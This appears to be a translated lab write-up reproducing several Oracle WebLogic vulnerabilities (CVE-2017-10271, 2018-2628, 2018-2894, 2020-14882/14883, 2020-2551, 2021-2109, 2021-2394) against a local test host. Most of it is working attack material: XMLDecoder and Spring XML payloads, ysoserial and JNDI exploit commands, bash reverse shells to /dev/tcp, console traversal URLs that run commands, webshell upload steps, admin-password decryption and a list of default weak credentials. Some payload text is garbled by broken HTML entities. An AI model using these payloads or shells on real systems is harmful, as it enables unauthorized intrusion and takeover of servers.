Weblogic vulnerability recurrence

0x01: Weblogic environment setup

Installation package, if you need different versions, you can download it directly from the official website

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

Double click to open

image-20210812014953267

Click Next

image-20210812015006342

image-20210812015037060

image-20210812015118942

image-20210812015147579

image-20210812015429032

Set account password, Oracle@123

image-20210812015619742

image-20210812015737257

image-20210812015756485

image-20210812015845200

Go to the directory and double-click

image-20210812020312756

Enter account password

image-20210812020550111

Then access port 7001

image-20210812021659068

Successfully built

image-20210812021716152

0x02: WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271)

1. Vulnerability Principle

? The cause of the CVE-2017-10271 vulnerability is that the Weblogic WLS Security component provides webservice services to the outside world, which uses XMLDecoder to parse the XML data passed in by the user. During the parsing process, a deserialization vulnerability occurs, resulting in the execution of arbitrary commands. . Attackers can even gain permissions by sending carefully constructed xml data through a rebound shell.

2. Affected version

10.3.6.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0

3. Vulnerability address

Default port: 7001
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

4. Vulnerability Recurrence

Version number 10.3.6.0

image-20210808191419130

Preliminary judgment, access to 192.168.88.133:7001/wls-wsat/CoordinatorPortType and the following image may contain a vulnerability.

image-20210808191539802

A similar page will appear when accessing the vulnerability path above. We use the data packet to verify whether the vulnerability exists.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.133:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=llYJhP8TvzYxpGhV4LFc1l6QS7PpryrXbZkDy5H86nLSxspLvWhq!-2109495751
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 596

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <java><java version="1.4.0" class="java.beans.XMLDecoder">
 <object class="java.io.PrintWriter">
 <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
 <void method="println">
<string>
 <![CDATA[
<% out.print("hello"); %>
 ]]>
 </string>
 </void>
 <void method="close"/>
 </object></java></java>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body/>
</soapenv:Envelope>

The return value is 500.

image-20210808192700017

access

http://192.168.88.133:7001/bea_wls_internal/test.jsp

image-20210808192828592

Successfully written, there is a vulnerability

Then bounce the shell. Data under POS

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i & amp;gt; & amp;amp; /dev/tcp/192.168.88.133/8888 0 & amp;gt; & amp;amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>

Start monitoring.

image-20210808193100371

Return to shell successfully

image-20210808193209039

0x03: Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)

1. Vulnerability Principle

? In WebLogic, the attacker uses other rmi to bypass weblogic blacklist restrictions, and then uses readObject to parse the loaded content, causing a deserialization remote code execution vulnerability. This vulnerability is mainly due to T3 The service is triggered. All open weblogic console port 7001 will enable the T3 service by default. The attacker can obtain the permissions of the target server by sending the constructed T3 protocol data.

? The server monitors ysoserial. The above reflection code is integrated into the payload of CommonsCollections in the ysoserial tool. In the end, it is still sun.reflect.annotation.AnnotationInvocationHandler. The payload generated by the attack end is sent to the weblogic deserialization connection server. The server sends the malicious serialization code to weblogic, and weblogic then deserializes it to implement the attack.

? In resolveProxyClass in InboundMsgAbbrev, resolveProxyClass handles the rmi interface type, and only java.rmi.registry.Registry is judged, which will cause any rmi interface to be bypassed. The core part is JRMP (Java Remote Method protocol). In this PoC, a RemoteObjectInvocationHandler will be serialized. It will use UnicastRef to establish a tcp connection to the remote end to obtain the RMI registry, load it back, and then use readObject to parse, thereby deserializing the remote code. implement.

2. Affected version

weblogic 10.3.6.0
weblogic 12.1.3.0
weblogic 12.2.1.2
weblogic 12.2.1.3

3. Vulnerability Recurrence

We first use nmap to scan whether the t3 protocol is used

image-20210817210044436

Use ysoserial to start a JRMP Server service

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "touch /tmp/1.txt"

image-20210808210455317

Use the cve-2018-2628.py script to send data packets to the target Weblogic. Here cve-2018-2628.py and ysoserial-0.0.6-SNAPSHOT-BETA-all.jar are placed in the same directory for use.

python CVE-2018-2628.py 192.168.88.133 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.88.133 9999 JRMPClient

image-20210817211509200

File written successfully on target machine

image-20210808212015461

Rebound shell

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA + JjE=}|{base64,-d }|{bash ,-i}"

image-20210817211730233

Directly use automated tools to get it right in one step. After a vulnerability is detected

image-20210811135439834

get shell

image-20210817211745767

Rebound shell

image-20210811135500971

bounce back to shell

image-20210811135703946

0x04: Weblogic Unauthorized Access + Arbitrary File Upload Vulnerability (CVE-2018-2894)

1. Vulnerability Principle

? Two unauthorized pages on the Weblogic management side have the vulnerability of uploading jsp files arbitrarily, thereby obtaining server permissions. Oracle has fixed an arbitrary file upload vulnerability in Weblogic Web Service Test Page. Web Service Test Page is not enabled by default in production mode’, so this vulnerability has certain limitations. The two pages are /ws_utc/begin.do and /ws_utc/config.do.

2. Affected version

weblogic 10.3.6.0
weblogic 12.1.3.0
weblogic 12.2.1.2
weblogic 12.2.1.3

3. Vulnerability Recurrence

image-20210811140819254

Unauthorized access to /ws_utc/config.do page

image-20210811144459267

Set the directory to the static file css directory of the ws_utc application. No permission is required to access this directory. Set the Work Home Dir to

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

Then click Security -> Add on the left, and then upload webshell:

image-20210811144715050

The final file name is timestamp_filename

image-20210811144756908

Then visit http://192.168.88.133:7001/ws_utc/css/config/keystore/1628662540500_JspSpy.jsp to execute webshell

image-20210811144919221

0x05: Weblogic Unauthorized Access + Remote Command Execution Vulnerability (CVE-2020-14882 &CVE-2020-14883)

1. CVE-2020-14883: Permission Bypass Vulnerability

A remote attacker can craft special HTTP requests to take over the WebLogic Server Console without authentication.

2. CVE-2020-14882: Code Execution Vulnerability

Combined with the CVE-2020-14883 vulnerability, a remote attacker can construct a special HTTP request to take over the WebLogic Server Console without authentication. > and execute arbitrary code in WebLogic Server Console.

3. Affected version

Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

4. Vulnerability Recurrence

we visit

http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel=AppDeploymentsControlPage & amp;handle=com.bea.console.handles.JMXHandle( "com.bea:Name=base_domain,Type=Domain")

Jump directly to the management console

image-20210811150233293

The permissions at this time are very low and applications cannot be installed in the background, so it needs to be combined with the CVE-2020-14883 vulnerability. There are two ways to exploit this vulnerability.

  • One is through com.tangosol.coherence.mvel2.sh.ShellSession

  • The second is through com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

Use com.tangosol.coherence.mvel2.sh.ShellSession to execute commands

http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel=HomePage1 & amp;handle=com.tangosol.coherence.mvel2.sh. ShellSession("java.lang.Runtime.getRuntime().exec('touch /tmp/fuck');");

File created successfully

image-20210811151016959

This exploitation method can only be used in Weblogic 12.2.1 or above, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in version 10. Use com.bea.core. When repackaging.springframework.context.support.FileSystemXmlApplicationContext class, you need to construct a malicious xml file. Construct malicious XML

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http: //www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i > & amp; /dev/tcp/192.168.88.133/1234 0> & amp;1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Then issue the following request through this class, allowing Weblogic to load this xml, execute the commands in it, and successfully bounce back to the shell.

http://192.168.88.133:7001/console/css/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel= & amp;handle=com.bea.core.repackaged.springframework.context .support.FileSystemXmlApplicationContext("http://192.168.88.133:8888/1.xml")

image-20210811162627772

0x06: Weblogic frontend any file reading & amp; & amp; weak password & amp; & amp; background getshell

1. Read any file

There are weak passwords in this environment:

  • weblogic

  • Oracle@123

    Visit http://your-ip:7001/hello/file.jsp?path=/etc/passwd to see that the passwd file is successfully read.

    image-20210812000955084

Then we can read the background user ciphertext and key file. The weblogic password is encrypted using AES (old version 3DES). The symmetric encryption can be decrypted. We only need to find the user’s ciphertext and encryption key. These two files are located under base_domain and are named SerializedSystemIni.dat and config.xml. In this environment, they are ./security/SerializedSystemIni.dat code> and ./config/config.xml (based on the current directory /root/Oracle/Middleware/user_projects/domains/base_domain). SerializedSystemIni.dat is a binary file, so it must be read with burpsuite. Direct downloading with a browser may introduce some interfering characters. Select the string of garbled characters read in burp, right-click copy to file to save it as a file:

image-20210812003319040

config.xml is the global configuration file of base_domain, so there is a lot of messy content. Find the value of , which is the encrypted value. Administrator password, don’t get it wrong:

image-20210812001418366

Then use the tools in the shooting range decrpty to decrypt it.

image-20210818210732050

2. Commonly used Weblogic weak passwords

system:password
weblogic:weblogic
admin:security
joe:password
mary:password
system:security
wlcsystem:wlcsystem
wlpisystem:wlpisystem

3. Upload war package GetShell in the background

3.1 war introduction
  • War is a web module that can be run directly. It is usually used for websites and is packaged and deployed into a container. After the war package is placed in the web directory, it can be automatically decompressed, which is equivalent to publishing.
  • To put it simply, the war package is a package of JavaWeb program. The war package includes the class files compiled by the written code, dependent packages, configuration files, and all website pages, including html, jsp, etc. A war package can be understood as a web project, which contains all the items of the project.
3.2 war packaging
  • Pack files into war compressed packages under linux
jar -cvf blog.war *
  • View example.war
jar -tf blog.war

  • You can also compress the file into zip first, and then change the suffix to war.

    Click to deploy

    image-20210812004041997

Click to upload file

image-20210812004118168

Then upload the war package and continue to the next step and then complete. Then Ice Scorpion connects

http://192.168.88.133:7001/shell/shell.jsp

image-20210812004447579

0x07: Weblogic IIOP protocol deserialization RCE (CVE-2020-2551)

1. Vulnerability Principle

? The Weblogic IIOP protocol is enabled by default and listens on port 7001 together with the T3 protocol. The main reason for this vulnerability is the incorrect filtering of the JtaTransactionManager class. The parent class of JtaTransactionManager, AbstractPlatformTransactionManager, was added to the blacklist in the previous patch. The T3 protocol uses The resolveClass method is used to filter. The resolveClass method will read the parent class, so there is no problem with T3 protocol filtering in this way. However, although the blacklist is also used in the IIOP protocol, it is not judged using the resolveClass method. By default, only the class name of this class is judged. The JtaTransactionManager class is not in the blacklist and there is jndi injection.

2. Affected version

Use marshalsec to launch a malicious RMI service.

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999

Compile EXP locally, and then start a web server locally

exp

import java.io.IOException;

public class Exploit {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
\t\t
}
}

compile

javac Exploit.java

Run jar package from command line

java -jar weblogic_CVE_2020_2551.jar 192.168.88.133 7001 rmi://192.168.88.133:1099/Exploit

Reproduction failed. . .

0x08: Weblogic remote code execution vulnerability (CVE-2021-2109)

Principle of vulnerability

The vulnerability is a remote code execution vulnerability in Weblogic. The vulnerability is mainly injected by JNDI, allowing attackers to exploit this vulnerability for remote code execution.

1. Affected version

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

2. Vulnerability Recurrence

Reference link https://mp.weixin.qq.com/s/-ExbVwY7K3fY07h-KP4DEA

Docker is used here to build the environment

docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

Visit http://your-ip:49163/console to see the page, User: weblogic Pass: welcome1

Start LDAP

java -jar JNDIExploit-v1.11.jar -i 192.168.88.133

Then send the packet

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/ WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
cmd:bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA + JjE=}|{base64,-d}|{bash,-i}
Connection: close
Referer: http://192.168.88.133:49163/console/console.portal?_nfpb=true & amp;_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=5ZY9z_8Wg654bjnM0Hmf8bqUjHKmT7Drs0qIkallCxuU154ML2u5!692946862
If-Modified-Since: Wed, 21 May 2014 19:34:20 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20210813124455254

bounce back to shell

image-20210813124959775

2.1 Coordinating with unauthorized access
Cooperate with Weblogic unauthorized scope command execution
/console/css/../consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88.133:1389/Basic/WeblogicEcho ;AdminServer")

You can use this POC to log in to the backend. If you are not authorized, use the above one.
/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho; AdminServer")
GET /console/css/%2e%2e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88 ;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.133:49163/console/login/LoginForm.jsp
cmd:id
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

image-20210813131144136

0x09: Weblogic T3 deserialization (CVE-2021-2394)

1. Vulnerability Recurrence

Here we borrow the environment of cve-2020-14882

The command is as follows:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/aaa.txt" -A 192.168.88.133
-C [command to execute]
-A [Open the ip of the ldap service]

image-20210813135257223

outsourcing

image-20210813135317065

File created successfully

image-20210813135826899

Rebound shell, remember to encode.

image-20210813140109238

0x10: Several ways to write shell in weblogic

? For deserialization vulnerabilities, if you obtain system permissions or root permissions, there is no need to upload the Trojan, but if you only have permissions to install applications on the web, upload them to obtain greater permissions. Uploading requires finding several points to obtain the physical path, such as the following three:

1. Method 1: Write webshell in console images

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

2. Method 2: Write to the uddiexplorer directory

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\random characters\war\shell.jsp
Visit `http://*.*.*.*:7001/uddiexplorer/shell.jsp

3. Method 3: Write in the application installation directory

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\project name\random characters\war\shell.jsp
Visit `http://*.*.*.*:7001/project name/shell.jsp

https://xz.aliyun.com/t/10365

https://cloud.tencent.com/developer/article/1861375

https://python.iitter.com/other/130547.html